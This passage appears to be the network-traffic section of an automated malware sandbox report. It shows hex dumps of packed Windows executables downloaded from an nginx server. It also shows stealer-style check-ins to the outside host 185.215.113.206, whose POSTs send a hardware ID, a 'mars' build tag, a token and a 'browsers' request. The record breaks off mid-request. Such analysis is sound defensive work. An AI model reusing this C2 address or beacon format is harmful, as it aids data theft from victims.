00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 92 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 78 62 6f 6a 70 6e 76 61 00 40 2b 00 00 b0 06 00 00 32 2b 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 65 71 76 6c 7a 6d 61 00 10 00 00 00 f0 31 00 00 06 00 00 00 c6 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 32 00 00 22 00 00 00 cc 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 12 Nov 2024 20:22:08 GMTContent-Type: application/octet-streamContent-Length: 3128832Last-Modified: Tue, 12 Nov 2024 20:08:49 GMTConnection: keep-aliveETag: "6733b5d1-2fbe00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 43 a3 32 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 dc 03 00 00 c8 00 00 00 00 00 00 00 d0 2f 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 30 00 00 04 00 00 d1 a1 30 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 50 05 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 51 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 30 05 00 00 10 00 00 00 30 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 40 05 00 00 00 00 00 00 40 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 50 05 00 00 02 00 00 00 40 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 68 65 75 74 69 72 6e 6d 00 60 2a 00 00 60 05 00 00 56 2a 00 00 42 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 78 6b 74 64 63 67 63 00 10 00 00 00 c0 2f 00 00 04 00 00 00 98 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 2f 00 00 22 00 00 00 9c 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 12 Nov 2024 20:22:13 GMTContent-Type: application/octet-streamContent-Length: 1811456Last-Modified: Tue, 12 Nov 2024 20:08:55 GMTConnection: keep-aliveETag: "6733b5d7-1ba400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce ac e2 38 8a cd 8c 6b 8a cd 8c 6b 8a cd 8c 6b e5 bb 27 6b 92 cd 8c 6b e5 bb 12 6b 87 cd 8c 6b e5 bb 26 6b b0 cd 8c 6b 83 b5 0f 6b 89 cd 8c 6b 83 b5 1f 6b 88 cd 8c 6b 0a b4 8d 6a 89 cd 8c 6b 8a cd 8d 6b d1 cd 8c 6b e5 bb 23 6b 98 cd 8c 6b e5 bb 11 6b 8b cd 8c 6b 52 69 63 68 8a cd 8c 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4f c3 2f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 40 22 00 00 00 00 00 00 90 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 69 00 00 04 00 00 2d ec 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 62 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 a0 24 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2a 00 00 c0 24 00 00 02 00 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 73 67 6f 69 63 77 70 69 00 10 1a 00 00 70 4f 00 00 08 1a 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6c 72 79 7a 7a 79 61 00 10 00 00 00 80 69 00 00 04 00 00 00 7e 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 69 00 00 22 00 00 00 82 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 12 Nov 2024 20:22:22 GMTContent-Type: application/octet-streamContent-Length: 2811392Last-Modified: Tue, 12 Nov 2024 20:07:34 GMTConnection: keep-aliveETag: "6733b586-2ae600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 34 df 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 69 74 6b 62 6c 71 67 00 a0 2a 00 00 a0 00 00 00 84 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 6f 78 72 74 6a 78 61 00 20 00 00 00 40 2b 00 00 06 00 00 00 be 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 c4 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 12 Nov 2024 20:22:29 GMTContent-Type: application/octet-streamContent-Length: 2811392Last-Modified: Tue, 12 Nov 2024 20:07:36 GMTConnection: keep-aliveETag: "6733b588-2ae600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 34 df 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 69 74 6b 62 6c 71 67 00 a0 2a 00 00 a0 00 00 00 84 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 6f 78 72 74 6a 78 61 00 20 00 00 00 40 2b 00 00 06 00 00 00 be 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 c4 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 12 Nov 2024 20:22:42 GMTContent-Type: application/octet-streamContent-Length: 2811392Last-Modified: Tue, 12 Nov 2024 20:07:36 GMTConnection: keep-aliveETag: "6733b588-2ae600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 34 df 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 69 74 6b 62 6c 71 67 00 a0 2a 00 00 a0 00 00 00 84 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 6f 78 72 74 6a 78 61 00 20 00 00 00 40 2b 00 00 06 00 00 00 be 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 c4 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 12 Nov 2024 20:23:11 GMTContent-Type: application/octet-streamContent-Length: 2811392Last-Modified: Tue, 12 Nov 2024 20:07:36 GMTConnection: keep-aliveETag: "6733b588-2ae600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2b 00 00 04 00 00 34 df 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 69 74 6b 62 6c 71 67 00 a0 2a 00 00 a0 00 00 00 84 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 6f 78 72 74 6a 78 61 00 20 00 00 00 40 2b 00 00 06 00 00 00 be 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2b 00 00 22 00 00 00 c4 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFBFCBFBKECAAKJKFBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 42 36 31 44 43 42 31 33 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="hwid"E3B61DCB13684217651120------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="build"mars------GDBFBFCBFBKECAAKJKFB--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHDHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 64 37 34 35 64 33 32 39 38 39 64 31 36 38 64 33 36 63 65 36 36 38 30 37 37 35 36 39 39 63 65 33 35 37 32 39 63 66 33 37 62 39 61 36 63 65 35 37 32 31 65 64 64 63 32 32 64 30 32 38 64 30 65 64 33 63 65 31 65 34 34 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 2d 2d 0d 0a Data Ascii: ------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; 